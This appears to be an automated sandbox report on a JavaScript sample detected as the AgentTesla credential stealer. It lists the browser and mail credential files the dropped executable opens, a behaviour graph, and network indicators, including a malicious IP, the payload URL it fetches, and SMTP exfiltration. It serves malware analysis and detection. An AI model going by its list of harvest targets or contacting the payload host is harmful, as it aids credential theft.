Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\tqxse.exe "C:\Users\user\AppData\Local\Temp\tqxse.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tqxse.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 5.0.tqxse.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.wscript.exe.1830f63b3a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.wscript.exe.1830f63b3a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.wscript.exe.1830f63b3a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.2374197721.000001830F63C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2373428146.0000018312751000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2382112016.0000018312682000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2373276954.0000000000702000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: tqxse.exe PID: 1292, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tqxse.exe, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 5.0.tqxse.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.wscript.exe.1830f63b3a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.wscript.exe.1830f63b3a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.wscript.exe.1830f63b3a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.2374197721.000001830F63C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2373428146.0000018312751000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2382112016.0000018312682000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2373276954.0000000000702000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3412173760.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: tqxse.exe PID: 1292, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tqxse.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 5.0.tqxse.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.wscript.exe.1830f63b3a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.wscript.exe.1830f63b3a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.wscript.exe.1830f63b3a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.2374197721.000001830F63C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2373428146.0000018312751000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2382112016.0000018312682000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2373276954.0000000000702000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: tqxse.exe PID: 1292, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tqxse.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467969 Sample: DVycy79WuR.js Startdate: 05/07/2024 Architecture: WINDOWS Score: 100 29 smtp.gmail.com 2->29 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Antivirus detection for dropped file 2->45 47 9 other signatures 2->47 8 wscript.exe 4 15 2->8         started        signatures3 process4 dnsIp5 31 192.210.215.11, 49710, 80 AS-COLOCROSSINGUS United States 8->31 21 C:\Users\user\AppData\Local\Temp\DNQUBU.js, Unicode 8->21 dropped 23 C:\Users\user\AppData\Local\...\mkl[1].js, Unicode 8->23 dropped 49 System process connects to network (likely due to code injection or exploit) 8->49 51 Benign windows process drops PE files 8->51 53 JScript performs obfuscated calls to suspicious functions 8->53 55 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->55 13 wscript.exe 2 8->13         started        file6 signatures7 process8 file9 25 C:\Users\user\AppData\Local\Temp\tqxse.exe, PE32 13->25 dropped 57 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->57 17 tqxse.exe 2 13->17         started        signatures10 process11 dnsIp12 27 smtp.gmail.com 142.251.173.109, 54850, 54856, 54857 GOOGLEUS United States 17->27 33 Antivirus detection for dropped file 17->33 35 Multi AV Scanner detection for dropped file 17->35 37 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->37 39 4 other signatures 17->39 signatures13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.251.173.109
 smtp.gmail.com United States
15169 GOOGLEUS false
192.210.215.11
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted Domains

Name IP Active
smtp.gmail.com 142.251.173.109 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://192.210.215.11/zoom/mkl.js true
  • Avira URL Cloud: safe
 unknown